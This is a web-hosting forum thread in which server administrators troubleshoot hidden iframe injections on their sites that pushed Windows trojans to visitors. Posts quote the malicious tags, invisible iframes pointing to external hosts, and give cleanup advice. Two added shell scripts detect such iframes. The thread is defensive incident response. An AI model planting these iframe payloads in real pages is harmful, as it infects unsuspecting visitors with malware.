trojan on the server?!

deltaned

Hi, is it possible that there is a trojan active on my redhat 7.3 machine?
I spoke to a customer who told me there is a: trojan.noupdate.b
It will open a new window with the url: c.coolchader.com
Most of the time the customer sees this at the webmail selection.

Where can I check this or find the trojan?
 
Quote from Symantec:

Trojan.Noupdate.B is a Trojan horse that attempts to prevent users from updating their computer with the latest Microsoft Windows patches and antivirus updates.

affected systems: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP

I'll assume you only have 1 person with this problem?

Chris
 
There are 2 persons (of this reseller) with the same problem.
Virus files detected:
dlm.exe
reg32.exe

IE opens a new window with the URL:
dl.html
c.coolshader.com

As far as I can find information, it is a Windows trojan and I can't find anything on my server.

Am I right?
 
Hi,

I see he has placed an Iframe tag under every page: <IFRAME SRC="http://www.b00gle.com/fa/?d=get" WIDTH=1 HEIGHT=1></IFRAME>
 
It's a Windows trojan / spyware / dialer, although it's on your system so I'll assume you have had unauthorized users gain access to your system somehow also..

Run chkrootkit and other similar apps to check your system's status, check your system's 'last' command to determine recent access to the system from users besides yourself also... you could check the date your /var/www/html/index.(index file) was modified which may help you also.... have a look at your webmail's source to check if there's anything like the above code there

The main problem being, if it's in your webmail and it's in your system's main html it's likely to be in a variety of other places also... and since it's likely a cracker has gained access they could well have done more than simply adding bits of html, and it's quite likely they have if they managed to gain access in the first place...

For your users (and probably yourself if you run Windows) you will be wanting the following link for reference:

http://computercops.org/modules.php?name=Forums&file=viewtopic&p=134881

Finally, the important thing with security: think before you fix... or you will make things far worse; basics first - lock down all external access (ssh / telnet) besides your own IP, lock down your firewall as tight as possible, check all running processes for anything unusual, check netstat to ensure there are no connections live besides standard http / ftp / mail / dns

Once you have done the above start doing system checks: use grep to check all users' html for that code, check your /var/www/html files for it, phpmyadmin, uebimiau, squirrelmail etc.

For the future you may also want to get something like TripWire (on your redhat disks for you!) which will notify you once files are modified, a must for a situation like this :)

Good luck with it...

Chris
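To make the checklist above concrete (grep all users' html for the injected tag, and check when the index file was last modified), here is an added shell example; it is not code from this thread or from DirectAdmin. It assumes the web roots are /var/www/html and /home/*/domains/*/public_html, and it looks for the shape of the two iframe tags quoted in this thread: an external src together with a width or height of 0 or 1.

```shell
#!/bin/sh
# Added example, not code from the thread. Scans a web root for hidden <iframe>
# tags shaped like the two quoted in this thread (external src, width or height
# of 0 or 1) and lists files changed recently. All paths are assumptions: on a
# Red Hat / DirectAdmin box user sites usually live under
# /home/*/domains/*/public_html and the default docroot is /var/www/html.

# One optional quote character around an attribute value (width=1, width="1", width='1').
Q="[\"']?"

# scan_hidden_iframes DIR
# Prints "file:line:content" for every line holding an <iframe> whose src is an
# external http(s) URL and whose width or height is 0 or 1. A zero-size iframe
# loading a remote page is the classic drive-by injection; a legitimate embed
# has visible dimensions. Tags split across several lines are not matched, so
# review the raw grep for '<iframe' as well if this prints nothing.
# Exit status is non-zero when nothing suspicious was found (grep semantics).
scan_hidden_iframes() {
    grep -r -i -n -E '<iframe' "$1" 2>/dev/null \
        | grep -i -E "src=${Q}https?://" \
        | grep -i -E "(width|height)=${Q}[01]${Q}[[:space:]>/]"
}

# recent_changes DIR DAYS
# Lists regular files under DIR modified within the last DAYS days (default 7).
# Compare against the dates you know you deployed content; an index file that
# changed when nobody deployed anything is what the thread suggests looking for.
recent_changes() {
    find "$1" -type f -mtime -"${2:-7}" -print
}

# Usage when run directly on the server (assumed paths):
#   scan_hidden_iframes /var/www/html
#   for d in /home/*/domains/*/public_html; do scan_hidden_iframes "$d"; done
#   recent_changes /var/www/html 14
```

The scan is only a heuristic for the two tag shapes seen in this thread; a file that was rewritten without an iframe (for example a changed .htaccess or CGI) only shows up in the recent_changes listing, so read both outputs together.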
 
Chris,

I've read this thread three times and I can't see where it could affect his server? Everything I've found on it says it can only run on Windows systems.

I don't see how he could be affected or infected.

Jeff
 
It's not that the system was 'infected'; it seems rather (as I said above) that someone has gained access to the system and placed the html code (posted above also) in some of the pages, thus causing clients and general internet users (using non-updated versions of IE) to gain the trojan / virus / dialler.

Chris
 
BUG Panel Directadmin !!

http://www.directadmin.com/forum/showthread.php?t=19004&highlight=iframe

http://www.directadmin.com/forum/showthread.php?t=2786&highlight=iframe


Hi, I have a similar problem. The problem is at the index of the IP, exe: http://MYIP/ and sometimes it is there, sometimes it is not, so I checked /var/www/html/index.html and nothing like it came up and nothing has been changed recently, and this is what I get: <iframe src='http://www.17rxsf.com/' width=100 height=0>

But when I do F5 on my PC I see this code <iframe src='http://www.17rxsf.com/' width=100 height=0> in the webpage source, but if I do F5 a couple of times more it's not there anymore

Code:
<iframe src='http://www.17rxsf.com/' width=100 height=0>                                                                                                                                                                                                                                               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
 <HEAD>
  <TITLE>Test Page for the SSL/TLS-aware Apache Installation on Web Site</TITLE>
  <STYLE TYPE="text/css">
  H1 {
      font-weight: bold;
      font-size: 18pt;
      line-height: 18pt;
      font-family: arial,helvetica;
      font-variant: normal;
      font-style: normal;
  }
  BODY {
      color: black;
      background-color: white;
      background-image: url(manual/images/feather.jpg);
      background-repeat: no-repeat;
  }
  </STYLE>
 </HEAD>
<!-- Background white, links blue (unvisited), navy (visited), red (active) -->
 <BODY
  BGCOLOR="#FFFFFF"
  TEXT="#000000"
  LINK="#0000FF"
  VLINK="#0000FF"
  ALINK="#FF0000"
 >
  <BLOCKQUOTE>
  <BLOCKQUOTE>
  <BR>
  <H1>
  Hey, it worked <I>!</I><BR>
  The SSL/TLS-aware Apache webserver was<BR>
  successfully installed on this website.
  </H1>
  <P>
  If you can see this page, then the people who own this website have just
  installed the <A HREF="http://www.apache.org/">Apache Web server</A>
  software and the <A HREF="http://www.modssl.org/">Apache
  Interface to OpenSSL (mod_ssl)</A> successfully.  They now have to add
  content to this directory and replace this placeholder page, or else point
  the server at their real content.
  </P>
  <BLOCKQUOTE>
   <STRONG>ATTENTION!</STRONG><BR>
   If you are seeing this page instead of the site you expected, please
   <STRONG>contact the administrator of the site involved.</STRONG>
   (Try sending mail to <SAMP><webmaster@<EM>domain</EM>></SAMP>.)
   Although this site is
   running the Apache software it almost certainly has no other connection
   to the Apache Group, so please do not send mail about this site or its
   contents to the Apache authors.  If you do, your message will be
   <STRONG>ignored</STRONG>.
  </BLOCKQUOTE>
  <P>
  The Apache online
  <A
   HREF="manual/index.html"
  >documentation</A>
  has been included with this distribution.<BR>
  Especially also read the 
  <A
   HREF="manual/mod/mod_ssl/"
  >mod_ssl User Manual</A>
  carefully.
  </P>
  <P>
  Your are allowed to use the images below on your SSL-aware Apache Web server.<BR>
  Thanks for using Apache, mod_ssl and OpenSSL!
  </P>
  <P>
  <DIV ALIGN="CENTER">
   <A HREF="http://www.apache.org/"
   ><IMG SRC="manual/images/apache_pb.gif" ALT="Apache Webserver" BORDER=0></A>
    
   <A HREF="http://www.modssl.org/"
   ><IMG SRC="manual/images/mod_ssl_sb.gif" ALT="mod_ssl Interface" BORDER=0></A>
    
   <A HREF="http://www.openssl.org/"
   ><IMG SRC="manual/images/openssl_ics.gif" ALT="OpenSSL Toolkit" BORDER=0></A>
  </DIV>
  </BLOCKQUOTE>
  </BLOCKQUOTE>
 </BODY>
</HTML>
 
So it's not a bug after all. You've been hacked.

This post doesn't require its own thread; I've merged it with the second of the two threads you've included as example. I don't see where this has anything to do with DirectAdmin. Am I missing something?

Jeff
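The report earlier in this thread, that the iframe shows up on some page loads and not others while /var/www/html/index.html on disk is clean, is worth testing directly. The added shell example below is not code from the thread or from DirectAdmin; it samples the served page several times and diffs each response against the on-disk file, so a tampered file (extra line every time) can be told apart from an injector in the serving path (extra line only sometimes, or only for certain clients). The URL, file path and user agent are assumptions.

```shell
#!/bin/sh
# Added example, not code from the thread. Compares what the web server sends
# with what is on disk, repeatedly, to decide whether an injected <iframe>
# comes from a modified file or from something in the serving path (a patched
# Apache binary or module, a rogue .htaccess / rewrite rule, a proxy in front).

# fetch_page URL  -> prints the response body.
# The pages in this thread targeted IE users, so the request carries an old IE
# user agent (assumption: an injector may key on it). Override this function to
# run the rest offline.
fetch_page() {
    curl -s -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "$1"
}

# injected_lines RESPONSEFILE DISKFILE
# Prints lines of the served response that do not occur verbatim in the on-disk
# file. With -x -F every disk line is an exact whole-line pattern, so the padded
# "<iframe ...>        <!DOCTYPE ...>" line from the thread is reported even
# though the DOCTYPE part of it is legitimate.
injected_lines() {
    grep -v -x -F -f "$2" "$1" || true
}

# count_injected_fetches URL DISKFILE N
# Fetches URL N times and prints "k/N": the number of responses that carried an
# <iframe> absent from the on-disk file. Anything above 0/N against a clean file
# means the injection happens at serve time, not in the file; N/N with the tag
# visible in the file itself means the file was tampered with.
count_injected_fetches() {
    url=$1; disk=$2; n=$3
    hits=0; i=0
    tmp=$(mktemp)
    while [ "$i" -lt "$n" ]; do
        fetch_page "$url" > "$tmp"
        extra=$(injected_lines "$tmp" "$disk" | grep -c -i '<iframe' || true)
        if [ "$extra" -gt 0 ]; then hits=$((hits + 1)); fi
        i=$((i + 1))
    done
    rm -f "$tmp"
    echo "$hits/$n"
}

# Usage on the server (assumed values):
#   count_injected_fetches http://MYIP/ /var/www/html/index.html 20
```

Run it from a second machine as well as from the server itself: if the count differs between the two, whatever adds the tag sits between the server and the outside world rather than on the host.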
 